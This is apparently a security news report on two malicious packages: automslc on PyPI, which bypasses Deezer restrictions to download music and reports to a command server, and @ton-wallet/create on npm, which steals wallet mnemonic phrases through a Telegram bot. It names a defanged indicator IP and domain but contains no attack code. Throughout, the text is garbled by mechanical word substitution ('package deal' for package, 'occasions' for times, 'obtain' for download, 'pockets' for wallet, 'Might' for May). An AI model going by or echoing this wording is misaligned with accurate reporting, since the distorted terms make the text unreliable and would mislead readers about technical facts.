Cybersecurity researchers have flagged a malicious Python library on the Python Package deal Index (PyPI) repository that facilitates unauthorized music downloads from music streaming service Deezer.
The package deal in query is automslc, which has been downloaded over 104,000 occasions so far. First printed in Might 2019, it stays accessible on PyPI as of writing.
“Though automslc, which has been downloaded over 100,000 occasions, purports to supply music automation and metadata retrieval, it covertly bypasses Deezer’s entry restrictions by embedding hardcoded credentials and speaking with an exterior command-and-control (C2) server,” Socket safety researcher Kirill Boychenko mentioned in a report printed immediately.
Particularly, the package deal is designed to log into the French music streaming platform through user-supplied and hard-coded credentials, collect track-related metadata, and obtain full audio recordsdata in violation of Deezer’s API phrases.
The package deal additionally periodically communicates with a distant server positioned at “54.39.49[.]17:8031” to supply updates on the obtain standing, thereby giving the risk actor centralized management over the coordinated music piracy operation.
Put in another way, automslc successfully turns the techniques of the package deal customers into a bootleg community for facilitating bulk music downloads in an unauthorized method. The IP deal with is related to a website named “automusic[.]win,” which is alleged for use by the risk actor to supervise the distributed downloading operation.
“Deezer’s API phrases forbid the native or offline storage of full audio content material, however by downloading and decrypting total tracks, automslc bypasses this limitation, probably putting customers susceptible to authorized repercussions,” Boychenko mentioned.
The disclosure comes because the software program provide chain safety firm detailed a rogue npm package deal known as @ton-wallet/create that has been discovered stealing mnemonic phrases from unsuspecting customers and builders within the TON ecosystem, whereas impersonating the reputable @ton/ton package deal.
The package deal, first printed to the npm registry in August 2024, has attracted 584 downloads so far. It stays accessible for obtain.
The malicious performance embedded into the library is able to extracting the method.env.MNEMONIC atmosphere variable, thereby giving risk actors full entry to a cryptocurrency pockets and probably drain a sufferer’s digital belongings. The data is transmitted to an attacker-controlled Telegram bot.
“This assault poses extreme provide chain safety dangers, concentrating on builders and customers integrating TON wallets into their purposes,” Socket mentioned. “Common dependency audits and automatic scanning instruments ought to be employed to detect anomalous or malicious behaviors in third-party packages earlier than they’re built-in into manufacturing environments.”
Replace
The Python package deal “automslc” is now not accessible for obtain from PyPI.